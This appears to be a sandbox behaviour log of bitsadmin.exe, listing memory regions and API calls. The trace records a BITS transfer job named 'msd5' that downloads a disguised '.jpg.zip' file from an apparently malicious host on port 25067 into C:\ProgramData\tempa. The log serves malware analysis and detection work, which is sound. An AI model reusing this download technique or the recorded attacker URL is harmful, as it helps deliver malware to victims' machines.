end_va = 0x76e3ffff
entry_point = 0x76da0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1176
start_va = 0x76e60000
end_va = 0x76f00fff
entry_point = 0x76e60000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1177
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 1178
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 1179
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1180
start_va = 0x190000
end_va = 0x196fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000190000"
filename = ""
Region:
id = 1181
start_va = 0x1a0000
end_va = 0x1a1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001a0000"
filename = ""
Region:
id = 1182
start_va = 0x1b0000
end_va = 0x1b0fff
entry_point = 0x1b0000
region_type = mapped_file
name = "bitsadmin.exe.mui"
filename = "\\Windows\\System32\\en-US\\bitsadmin.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\bitsadmin.exe.mui")
Region:
id = 1183
start_va = 0x1c0000
end_va = 0x1c0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 1184
start_va = 0x210000
end_va = 0x310fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000210000"
filename = ""
Region:
id = 1185
start_va = 0x320000
end_va = 0x320fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000320000"
filename = ""
Region:
id = 1186
start_va = 0xf30000
end_va = 0x1b2ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000f30000"
filename = ""
Region:
id = 1187
start_va = 0x450000
end_va = 0x4abfff
entry_point = 0x450000
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 1188
start_va = 0x450000
end_va = 0x4abfff
entry_point = 0x450000
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 1189
start_va = 0x74fc0000
end_va = 0x74fcbfff
entry_point = 0x74fc0000
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 1190
start_va = 0x736a0000
end_va = 0x736dffff
entry_point = 0x736a0000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 1191
start_va = 0x450000
end_va = 0x4fffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000450000"
filename = ""
Region:
id = 1192
start_va = 0x5a0000
end_va = 0x67efff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005a0000"
filename = ""
Region:
id = 1193
start_va = 0x330000
end_va = 0x330fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000330000"
filename = ""
Region:
id = 1194
start_va = 0x770c0000
end_va = 0x77142fff
entry_point = 0x770c0000
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 1195
start_va = 0x758f0000
end_va = 0x7597efff
entry_point = 0x758f0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1196
start_va = 0x340000
end_va = 0x340fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000340000"
filename = ""
Region:
id = 1197
start_va = 0x680000
end_va = 0x6bffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000680000"
filename = ""
Region:
id = 1198
start_va = 0x7ffde000
end_va = 0x7ffdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffde000"
filename = ""
Region:
id = 1199
start_va = 0x7a0000
end_va = 0x7dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000007a0000"
filename = ""
Region:
id = 1200
start_va = 0x74b40000
end_va = 0x74b55fff
entry_point = 0x74b40000
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 1201
start_va = 0x7ffdd000
end_va = 0x7ffddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdd000"
filename = ""
Region:
id = 1202
start_va = 0x450000
end_va = 0x48bfff
entry_point = 0x450000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1203
start_va = 0x4c0000
end_va = 0x4fffff
entry_point = 0x0
region_type = private
name = "private_0x00000000004c0000"
filename = ""
Region:
id = 1204
start_va = 0x450000
end_va = 0x48bfff
entry_point = 0x450000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1205
start_va = 0x450000
end_va = 0x48bfff
entry_point = 0x450000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1206
start_va = 0x450000
end_va = 0x48bfff
entry_point = 0x450000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1207
start_va = 0x450000
end_va = 0x48bfff
entry_point = 0x450000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1208
start_va = 0x748e0000
end_va = 0x7491afff
entry_point = 0x748e0000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1209
start_va = 0x7e0000
end_va = 0xaaefff
entry_point = 0x7e0000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1210
start_va = 0x75060000
end_va = 0x7506dfff
entry_point = 0x75060000
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 1211
start_va = 0x720000
end_va = 0x75ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000720000"
filename = ""
Region:
id = 1212
start_va = 0xb30000
end_va = 0xb6ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000b30000"
filename = ""
Region:
id = 1213
start_va = 0x7ffdb000
end_va = 0x7ffdbfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdb000"
filename = ""
Region:
id = 1214
start_va = 0x7ffdc000
end_va = 0x7ffdcfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdc000"
filename = ""
Region:
id = 1215
start_va = 0x6f8b0000
end_va = 0x6f8b8fff
entry_point = 0x6f8b0000
region_type = mapped_file
name = "qmgrprxy.dll"
filename = "\\Windows\\System32\\qmgrprxy.dll" (normalized: "c:\\windows\\system32\\qmgrprxy.dll")
Thread:
id = 117
os_tid = 0xb78
[0063.223] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20f9dc | out: lpSystemTimeAsFileTime=0x20f9dc*(dwLowDateTime=0xd65a4eb0, dwHighDateTime=0x1d469c7))
[0063.223] GetCurrentProcessId () returned 0xb74
[0063.223] GetCurrentThreadId () returned 0xb78
[0063.223] GetTickCount () returned 0x1dcc7
[0063.223] QueryPerformanceCounter (in: lpPerformanceCount=0x20f9d4 | out: lpPerformanceCount=0x20f9d4*=1813716800000) returned 1
[0063.223] GetModuleHandleA (lpModuleName=0x0) returned 0xee0000
[0063.224] __set_app_type (_Type=0x1)
[0063.224] __p__fmode () returned 0x757a31f4
[0063.224] __p__commode () returned 0x757a31fc
[0063.224] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf07f33) returned 0x0
[0063.224] __wgetmainargs (in: _Argc=0xf20824, _Argv=0xf2082c, _Env=0xf20828, _DoWildCard=0, _StartInfo=0xf20838 | out: _Argc=0xf20824, _Argv=0xf2082c, _Env=0xf20828) returned 0
[0063.224] _onexit (_Func=0xf0925e) returned 0xf0925e
[0063.224] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0063.225] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb
[0063.225] AitLogFeatureUsageByApp () returned 0x0
[0063.225] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18
[0063.225] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b
[0063.225] VerifyVersionInfoW (in: lpVersionInformation=0x20f850, dwTypeMask=0x3, dwlConditionMask=0x1b | out: lpVersionInformation=0x20f850) returned 1
[0063.225] SetLastError (dwErrCode=0x0)
[0063.225] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75370000
[0063.225] GetProcAddress (hModule=0x75370000, lpProcName="HeapSetInformation") returned 0x753c4157
[0063.225] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0063.226] GetCurrentProcess () returned 0xffffffff
[0063.226] GetCurrentThread () returned 0xfffffffe
[0063.226] GetCurrentProcess () returned 0xffffffff
[0063.226] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0xf0c3b0, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0xf0c3b0*=0x80) returned 1
[0063.226] SetConsoleCtrlHandler (HandlerRoutine=0xef74cb, Add=1) returned 1
[0063.226] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75370000
[0063.226] GetProcAddress (hModule=0x75370000, lpProcName="SetThreadUILanguage") returned 0x753c24c2
[0063.226] SetThreadUILanguage (LangId=0x0) returned 0x409
[0063.226] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437"
[0063.227] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437"
[0063.227] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437"
[0063.228] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437"
[0063.228] _wcsicmp (_String1="/transfer", _String2="/RAWRETURN") returned 2
[0063.228] _wcsicmp (_String1="/transfer", _String2="/WRAP") returned -3
[0063.228] _wcsicmp (_String1="/transfer", _String2="/NOWRAP") returned 6
[0063.228] swprintf_s (in: _Dst=0x20f948, _SizeInWords=0x12, _Format="%u.%u.%u" | out: _Dst="7.5.7601") returned 8
[0063.228] GetFileType (hFile=0x7) returned 0x2
[0063.228] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x20f8bc | out: lpMode=0x20f8bc) returned 1
[0063.228] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x20f8ec, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20f8ec*=0x2) returned 1
[0063.228] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0x24, lpNumberOfCharsWritten=0x20f8f8, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20f8f8*=0x24) returned 1
[0063.229] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x20f8fc, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20f8fc*=0x1e) returned 1
[0063.229] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0x29, lpNumberOfCharsWritten=0x20f900, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20f900*=0x29) returned 1
[0063.229] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x20f904, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20f904*=0x2) returned 1
[0063.229] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0x5e, lpNumberOfCharsWritten=0x20f908, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20f908*=0x5e) returned 1
[0063.229] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0x58, lpNumberOfCharsWritten=0x20f90c, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20f90c*=0x58) returned 1
[0063.229] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x20f910, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20f910*=0x2) returned 1
[0063.230] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0
[0063.240] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0063.240] GetNumberOfConsoleInputEvents (in: hConsoleInput=0x3, lpNumberOfEvents=0x20f95c | out: lpNumberOfEvents=0x20f95c) returned 1
[0063.240] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0063.240] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0xf0c3a8 | out: lpMode=0xf0c3a8) returned 1
[0063.241] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xf0c390 | out: lpConsoleScreenBufferInfo=0xf0c390) returned 1
[0063.241] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0xf0c38c | out: lpMode=0xf0c38c) returned 1
[0063.241] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0063.241] _wcsicmp (_String1="/transfer", _String2="/HELP") returned 12
[0063.241] _wcsicmp (_String1="/transfer", _String2="/?") returned 53
[0063.242] _wcsicmp (_String1="/transfer", _String2="/UTIL") returned -1
[0063.242] _wcsicmp (_String1="/transfer", _String2="/LIST") returned 8
[0063.242] _wcsicmp (_String1="/transfer", _String2="/MONITOR") returned 7
[0063.242] _wcsicmp (_String1="/transfer", _String2="/RESET") returned 2
[0063.242] _wcsicmp (_String1="/transfer", _String2="/TRANSFER") returned 0
[0063.242] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x1) returned 1
[0063.242] _wcsicmp (_String1="/priority", _String2="/UPLOAD") returned -5
[0063.242] _wcsicmp (_String1="/priority", _String2="/DOWNLOAD") returned 12
[0063.242] _wcsicmp (_String1="/priority", _String2="/PRIORITY") returned 0
[0063.242] _wcsicmp (_String1="foreground", _String2="FOREGROUND") returned 0
[0063.242] CoCreateInstance (in: rclsid=0xef65d4*(Data1=0x4991d34b, Data2=0x80a1, Data3=0x4291, Data4=([0]=0x83, [1]=0xb6, [2]=0x33, [3]=0x28, [4]=0x36, [5]=0x6b, [6]=0x90, [7]=0x97)), pUnkOuter=0x0, dwClsContext=0x4, riid=0xef65b4*(Data1=0x5ce34c0d, Data2=0xdc9, Data3=0x4c1f, Data4=([0]=0x89, [1]=0x7c, [2]=0xda, [3]=0xa1, [4]=0xb7, [5]=0x8c, [6]=0xee, [7]=0x7c)), ppv=0xf0c3b4 | out: ppv=0xf0c3b4*=0x36a53c) returned 0x0
[0063.281] IBackgroundCopyManager:CreateJob (in: This=0x36a53c, DisplayName="msd5", Type=0x0, pJobId=0x20f924, ppJob=0x20f920 | out: pJobId=0x20f924*(Data1=0xb505fc83, Data2=0x5199, Data3=0x4d5a, Data4=([0]=0xa2, [1]=0x3e, [2]=0xa, [3]=0xbc, [4]=0x18, [5]=0x6a, [6]=0xb8, [7]=0xe1)), ppJob=0x20f920*=0x36a614) returned 0x0
[0063.287] CoTaskMemAlloc (cb=0x50) returned 0x380c70
[0063.287] IUnknown:AddRef (This=0x36a614) returned 0x2
[0063.287] IUnknown:AddRef (This=0x36a614) returned 0x3
[0063.287] PeekMessageW (in: lpMsg=0x20f89c, hWnd=0x0, wMsgFilterMin=0x400, wMsgFilterMax=0x400, wRemoveMsg=0x0 | out: lpMsg=0x20f89c) returned 0
[0063.287] IUnknown:Release (This=0x36a614) returned 0x2
[0063.288] IBackgroundCopyJob:SetPriority (This=0x36a614, Val=0x0) returned 0x0
[0063.292] IBackgroundCopyJob:AddFile (This=0x36a614, RemoteUrl="http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmb.jpg.zip?607484307", LocalName="C:\\ProgramData\\tempa\\marxvxinhhmb.jpg") returned 0x0
[0063.300] IBackgroundCopyJob:SetNotifyFlags (This=0x36a614, Val=0xb) returned 0x0
[0063.303] IBackgroundCopyJob:SetNotifyInterface (This=0x36a614, Val=0x380c70) returned 0x0
[0063.303] IUnknown:QueryInterface (in: This=0x380c70, riid=0x76a63e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x20f3a0 | out: ppvObject=0x20f3a0*=0x0) returned 0x80004002
[0063.303] IUnknown:QueryInterface (in: This=0x380c70, riid=0x76a63e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x20f360 | out: ppvObject=0x20f360*=0x0) returned 0x80004002
[0063.303] IUnknown:QueryInterface (in: This=0x380c70, riid=0x76a597c4*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x20f348 | out: ppvObject=0x20f348*=0x0) returned 0x80004002
[0063.303] IUnknown:QueryInterface (in: This=0x380c70, riid=0x76a69b0c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x20f2fc | out: ppvObject=0x20f2fc*=0x380c70) returned 0x0
[0063.304] IUnknown:AddRef (This=0x380c70) returned 0x3
[0063.304] IUnknown:QueryInterface (in: This=0x380c70, riid=0x76a4c15c*(Data1=0x18, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x20f25c | out: ppvObject=0x20f25c*=0x0) returned 0x80004002
[0063.304] IUnknown:QueryInterface (in: This=0x380c70, riid=0x76a4c0a8*(Data1=0x19, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x380d84 | out: ppvObject=0x380d84*=0x0) returned 0x80004002
[0063.304] IUnknown:QueryInterface (in: This=0x380c70, riid=0x76a4c16c*(Data1=0x4c1e39e1, Data2=0xe3e3, Data3=0x4296, Data4=([0]=0xaa, [1]=0x86, [2]=0xec, [3]=0x93, [4]=0x8d, [5]=0x89, [6]=0x6e, [7]=0x92)), ppvObject=0x20f264 | out: ppvObject=0x20f264*=0x0) returned 0x80004002
[0063.304] IUnknown:Release (This=0x380c70) returned 0x2
[0063.306] IUnknown:QueryInterface (in: This=0x380c70, riid=0x371be8*(Data1=0x659cdeac, Data2=0x489e, Data3=0x11d9, Data4=([0]=0xa9, [1]=0xcd, [2]=0x0, [3]=0xd, [4]=0x56, [5]=0x96, [6]=0x52, [7]=0x51)), ppvObject=0x20e76c | out: ppvObject=0x20e76c*=0x0) returned 0x80004002
[0063.307] IUnknown:QueryInterface (in: This=0x380c70, riid=0x371be8*(Data1=0x97ea99c7, Data2=0x186, Data3=0x4ad4, Data4=([0]=0x8d, [1]=0xf9, [2]=0xc5, [3]=0xb4, [4]=0xe0, [5]=0xed, [6]=0x6b, [7]=0x22)), ppvObject=0x20e76c | out: ppvObject=0x20e76c*=0x380c70) returned 0x0
[0063.307] IUnknown:QueryInterface (in: This=0x380c70, riid=0x371be8*(Data1=0x97ea99c7, Data2=0x186, Data3=0x4ad4, Data4=([0]=0x8d, [1]=0xf9, [2]=0xc5, [3]=0xb4, [4]=0xe0, [5]=0xed, [6]=0x6b, [7]=0x22)), ppvObject=0x3782c0 | out: ppvObject=0x3782c0*=0x380c70) returned 0x0
[0063.309] IBackgroundCopyJob:Resume (This=0x36a614) returned 0x0
[0063.312] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0063.312] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0063.312] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x20f880 | out: lpMode=0x20f880) returned 1
[0063.317] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1b1) returned 1
[0063.317] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x20f8c0*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
[0063.317] PeekMessageW (in: lpMsg=0x20f898, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x20f898) returned 1
[0063.317] TranslateMessage (lpMsg=0x20f898) returned 0
[0063.317] DispatchMessageW (lpMsg=0x20f898) returned 0x1
[0063.317] IUnknown:QueryInterface (in: This=0x380c70, riid=0x76a4c17c*(Data1=0x1c733a30, Data2=0x2a1c, Data3=0x11ce, Data4=([0]=0xad, [1]=0xe5, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x44, [6]=0x77, [7]=0x3d)), ppvObject=0x20f3f4 | out: ppvObject=0x20f3f4*=0x0) returned 0x80004002
[0063.317] IBackgroundCopyCallback:JobModification (This=0x380c70, pJob=0x36a6a4, dwReserved=0x0) returned 0x0
[0063.317] IBackgroundCopyJob:GetState (in: This=0x36a614, pVal=0x380c7c | out: pVal=0x380c7c) returned 0x0
[0063.317] IBackgroundCopyCallback:JobModification (This=0x380c70, pJob=0x36a6a4, dwReserved=0x0) returned 0x0
[0063.317] IBackgroundCopyJob:GetState (in: This=0x36a614, pVal=0x380c7c | out: pVal=0x380c7c) returned 0x0
[0063.319] IBackgroundCopyJob:GetType (in: This=0x36a614, pVal=0x20df58 | out: pVal=0x20df58) returned 0x0
[0063.320] IBackgroundCopyJob:GetProgress (in: This=0x36a614, pVal=0x380c80 | out: pVal=0x380c80) returned 0x0
[0063.321] IBackgroundCopyJob:GetPriority (in: This=0x36a614, pVal=0x20df54 | out: pVal=0x20df54) returned 0x0
[0063.322] CoTaskMemFree (pv=0x0)
[0063.322] IBackgroundCopyJob:GetDisplayName (in: This=0x36a614, pVal=0x20df6c | out: pVal=0x20df6c*="msd5") returned 0x0
[0063.322] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20df14 | out: lpConsoleScreenBufferInfo=0x20df14) returned 1
[0063.323] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x20df2c | out: lpNumberOfCharsWritten=0x20df2c) returned 1
[0063.323] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x20df2c | out: lpNumberOfAttrsWritten=0x20df2c) returned 1
[0063.323] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0063.323] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0063.324] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20df00 | out: lpConsoleScreenBufferInfo=0x20df00) returned 1
[0063.324] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x20df18, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20df18*=0xa) returned 1
[0063.324] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0063.324] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20defc | out: lpConsoleScreenBufferInfo=0x20defc) returned 1
[0063.324] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x20df14, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20df14*=0x5) returned 1
[0063.324] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0063.325] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20df04 | out: lpConsoleScreenBufferInfo=0x20df04) returned 1
[0063.325] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x20df1c, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20df1c*=0x7) returned 1
[0063.325] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0063.325] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20def8 | out: lpConsoleScreenBufferInfo=0x20def8) returned 1
[0063.325] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x20df10, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20df10*=0x8) returned 1
[0063.325] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0063.326] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20df00 | out: lpConsoleScreenBufferInfo=0x20df00) returned 1
[0063.326] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x20df18, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20df18*=0x8) returned 1
[0063.326] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0063.326] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20def4 | out: lpConsoleScreenBufferInfo=0x20def4) returned 1
[0063.326] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x20df0c, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20df0c*=0xc) returned 1
[0063.326] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0063.327] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20df04 | out: lpConsoleScreenBufferInfo=0x20df04) returned 1
[0063.327] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x20df1c, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20df1c*=0xa) returned 1
[0063.327] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0063.327] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20deec | out: lpConsoleScreenBufferInfo=0x20deec) returned 1
[0063.327] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x20df04, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20df04*=0xa) returned 1
[0063.328] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0063.328] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20def4 | out: lpConsoleScreenBufferInfo=0x20def4) returned 1
